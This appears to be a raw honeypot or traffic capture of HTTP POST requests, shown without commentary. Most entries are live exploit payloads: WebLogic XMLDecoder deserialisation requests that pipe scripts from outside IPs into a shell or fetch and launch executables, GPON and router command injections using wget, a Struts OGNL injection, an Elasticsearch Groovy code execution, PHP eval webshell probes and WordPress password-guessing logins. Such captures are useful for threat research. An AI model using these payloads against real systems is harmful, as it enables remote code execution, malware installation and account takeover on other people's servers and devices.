User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å˙PbÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 416
Cache-Control: no-cache
RPRewt7JbU0i1uilF2EolNc/9QgGFxclyGJaoyw2/RZqzdPe2hQTbz6P4ZCFHziOPO9tcOHr+BoPT6QrflPvmMOEBkgtORgvo02juh8GGs0CGNgQ4t308VDNnim7d05VRHKYRJFcBUpi894bDt3gkZ5U+k3swdFUAepKt9+mGHk7VT2u3u1A/vS4RBA2oR7kuXvPJ+dsDbiORJYdCHqNFlyMvA8jo8CIRM+1CJiW/uFrkMfIXWorHGaoF1Cj4onDfS3DztW5jnj0bo3fL5yobfUUA7bbEmDICQ2L0DLIXwcTkH8GuUMjCSWJm2EIpEHFX5euRzNAfy/ZMHXvBynohBHo8nBndEtsoQ6rSviZmIgTaAFF5NuW4uV7mV62YvqXIYX+LORB20Ga/05SEtLpVHHgLx5qSw==
POST http://check.proxyradar.com/azenv.php?auth=149405774885&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /command.php HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74
POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive
<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åbˇg–Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îR
/Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 846
Host: x.x.x.x:7001
POST http://hyipgame.ru/socks/engine.php HTTP/1.0
Accept: */*
Referer: http://hyipgame.ru/socks/engine.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Host: hyipgame.ru
Content-Type: application/x-www-form-urlencoded
Content-length: 13
Pragma: no-cache
xrumer=inside
POST http://check.proxyradar.com/azenv.php?auth=145914623153&a=PSCMN&i=1760126605&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=161616
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache
RKQMyY6aZrInHS4hhGR5w0VoSx70XoXCNOdJ3Y4mWAA7DgTlOARBt5BtL9VRctyTdRjGATWRyGM/B+yy0wQ5zAaPCOUkdsuPP7vRFKBuf3I4ozSvub15448wZALdKnmMDYn9hhEFvXqVZyEiHw9fxVWFW/sWscaVLa12PSo4o/f0SnSJz1iTFLXGmzyWUhKXCBYPgYdkmwDJVBvUI79ZwBWwzF1Vgy3Ivwkp16FseVpyGdpP44bLaUsvJ+tJ5jZTt/T2tNIonmtnn+66kz5RnYKrv6T6Q6Od/6sVeuEc79UEtCTS+qgbfhnxqoG8F6khBOeJRfWrMolpTbYwTXPKFJ4uBt2KPCddHXdKI9g3v0LmalH92d8EvF6+N913fE78rA==
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache
F6cMxNnMY8uJPuO1PmTId6I0UeBDeqxUbroSjCP0+2J1xu9WMHpjpOWjM4FTR3YwpKznxbywQ9rWTvpUGd3afK3jOk7wPd2wc8ORieC3kJX+BBE15KrdJKyYClKGhJESKuNfGfMchOcCzeYB57CmgMt6Tnr7pfKBRNd+Aa6+ujBu+6s3JaT2sHngwz4yfOI9mGs1HTIPk2rfnfJzlI0QnPprRd9BwkxK8ErvAtyvfFN3FAaTJ6TsEQ4eIvc6483w3mxhLRdHdGuIz7l8YKQs/50YbzPo2ZcE4S54b658s7EiMffhkAXCCPPu2tJtoUnF0ar/Py8ys6i1StCIJiEIxwc1HKr2m2CWHMZKpPf+NJkCN0wedII4QSXzPxkaZYq5/tG4h/U=
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1069
Content-Type: multipart/form-data; boundary=eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
437136
--eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
458475fb51efee33bdbefa530b5890c9
--eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM--
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1300
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;@echo open 93.174.93.149&gt;sss.txt&amp;@echo binary&gt;&gt;sss.txt&amp;@echo get /taskhostxz.exe&gt;&gt;sss.txt&amp;@echo quit&gt;&gt;sss.txt&amp;@ftp -s:sss.txt -v -A&amp;@start taskhostxz.exe&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 364
Cache-Control: no-cache
E/QMxo/LNwb085dKJ9kB+xsyiRCN+YuRBRIkZmlyFRG8Q3oxTb3cd4rws4zu2idl708wrIUSINSnRP0dISuER3LcjdPhWEKdjA+dDquA26nsI0Gv1MPgsUEgfSBcrwBLKyDzrbH0aUh+0FkkPtPmgDmvo7kogjTF8bOWjEwZH6cWHPPeN6uwdvcSKXGjvH7sIta+v91yLTSW9ExHR0P7ZzbN364uom/CZg5ZK4cZ1dwwugeG0roTfD4Z98QgKVg3GgDclkteC4bkPFGVEnlElD9krZtpTRgQSrukElOidnKhPS1LG3NXniEM9tICbz7mKRvBxdHNqCnFpAo9wNxV5c+RBaicEg0r3mamFfRDGb4u
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 22
Cache-Control: no-cache
log=admin&pwd=12345678
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
Rq0PwY6ZZ/uSJUkakVGtD1phw5+idZ1D8bjxBavefbikVttxo4r0cQMvhc1svK3JlgLRLUgJGMuUKXpzzdd3zkhRtnCRfYq0aefjh6FLb72eZFs1uXVSS/e7iLUZRDXwelcQGkRIKCwQuKysHbC/4VYpRl1vSHy7nmrAntXzkdN74kXi1rxQtb7IK/5r8SGLM1ye7J2wlTpS5xMXdOvlIBAOAp9ld656DdRVYwKGAy7yWqimhWqLnksndDtgsuLlnVr8C2qru/1hfl5bSuLu+p4wnP6s/UYhuoeaDmGbqC0h1oTuXh4Fnl0jnVL4kWNUHxn8fDSQCE62Gh3noJiMCAUoq86AkXshe3zr/QrJBm5uO+ObYgSq/7yiAyGCXhC4ZE3bFqwpdzbR1Kb9jE3wLko+g5qhkugF1/zNibUq5cJJVuTmZH6i
POST /GponForm/diag_Form?images/ HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: x.x.x.x:80
Content-Type: text/plain
Content-length: 119
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://51.254.219.134/gpon.php?port=80&ipv=0
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å«™›^Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache
log=172&pwd=1722222
POST /login.action HTTP/1.1
Host:64.137.190.224:80
Accept-Language: zh_CN
User-Agent: Auto Spider 1.0
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 425
Content-Type: application/x-www-form-urlencoded
(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.web[0]),%23w.print(%23parameters.path[0]),%23w.close()):xx.toString.json?&pp=%2f&encoding=UTF-8&web=security_&path=check
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /hndUnblock.cgi HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded
submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=asd!@#
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å⁄‰¸,Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îN´3Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache
QvZdlI7KMW6/WIk+9qH+H56nocEMNqmiL3biNcnCLTcE8mvU4LNtQP5isGNhCjHm422ugkQzJj8RgMayMvdVVXiW6ZnZJ7cspjPfAHLjt3Ok9lIAi4W2q/QiQQGRh9iyA62KmR/O27zPrDbH4RaA0OC6rDvoxCG3+V5wp59tRwWOBOS7nLGp8mFs+1XVb1PRXx/PgXdQgyyQqLttcnv6rs57AFtekpN2rMkAGkMvkXnUi6sOhOKDObMbDmdKaf/Js0jm4A6Jzu3AmOeQwKxuZCTVnF8NKVDEz8m0dgOEA6Z+eGIiPCyEjk4XZ9OwAh3WdmIQMiwEXxbZrSoxsx1yqpzLr9hovAz+mt5SPWXvSwpcrTzS1Lh33YEzvWE=
POST http://t1.proxy-checks.com/favicon.ico HTTP/1.1
Host: t1.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache
Rqxdxd+abaj0zWwxvLfaAJkH3i3KWBgpbV34BHbzTEX9RWtHO+ypW8kNvKDmO1vF3JWhxy3vfGit0ZXMAV11TNJTYX4trlP9wNvkhik3ALeMoONHwFT9xdBKfsy6n2IFyCkfqI0v06CRMHzwuuekTZD2GAAx0EDXj1YuUHNe87mLP4smoHP1c7Be2pJVWzGjqorFo9mJJPiSNSZ+SqJIyctyah8ebQ/eg1CvSs8DrQn0R+M5ICs0H+L2nHcaQPNWV3ujVe9KQHmWeoQbFvOoDMDEG/bRJQ4NK4lF2fh1NH2U7oN+jcow1hpCaJax1sAjMLmaULJQi9EAsppXFIhPl+GPZiOtqNBSla8jRTLACXYP/iRvHJR7wMr1AkgOuDeZrJTlsjkv7A2JUl6oK1n+yh9XcmFoHu0Me+Q1HW5yISmiaw==
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
h=die('Hello, Peppa!');
POST http://tech.lovelyskin.ru/proxyc/engine.php HTTP/1.0
Accept: */*
Referer: http://tech.lovelyskin.ru/proxyc/engine.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Host: tech.lovelyskin.ru
Content-Type: application/x-www-form-urlencoded
Content-length: 13
Pragma: no-cache
xrumer=inside
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 32
Cache-Control: no-cache
log=jamesatchue&pwd=0jamesatchue
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1069
Content-Type: multipart/form-data; boundary=PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
952354
--PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
d27655b22d572c038d9f270482e322b3
--PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
